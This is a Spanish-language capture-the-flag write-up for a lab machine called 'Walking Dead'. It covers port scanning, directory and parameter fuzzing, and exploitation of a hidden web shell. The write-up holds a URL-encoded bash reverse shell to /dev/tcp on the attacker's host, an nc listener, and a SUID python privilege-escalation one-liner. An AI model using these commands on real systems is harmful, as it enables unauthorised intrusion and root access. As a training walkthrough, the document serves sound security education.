Walking Dead

✍️ Autor: JuanR🔍 Dificultad: Fácil 📅 Fecha de creación: 13/02/2025

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Revisando el código fuente encontramos una carpeta llamado hidden con un archivo shell.php.

Revisamos directorios.

gobuster dir -u "http://172.17.0.2/" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,html,php

Nos parece interesante el archivo backup.txt.

Nos dice que no se pueden listar directorios. Realizamos fuzzing para un parámetro vulnerable.

 wfuzz -c --hc=404 --hh=0 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  "http://172.17.0.2/hidden/.shell.php?FUZZ=id"

🚀 EXPLOTACIÓN

Hacemos una Reverse Shell pero codificamos a URL.

URL Encode Online

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F445%200%3E%261%22

Nos ponemos en escucha.

nc -nlvp 445

Hacemos tratamiento de la TTY.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO. Miramos entonces SUID.

find / -perm -4000 2>/dev/null

python | GTFOBins

/usr/bin/python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'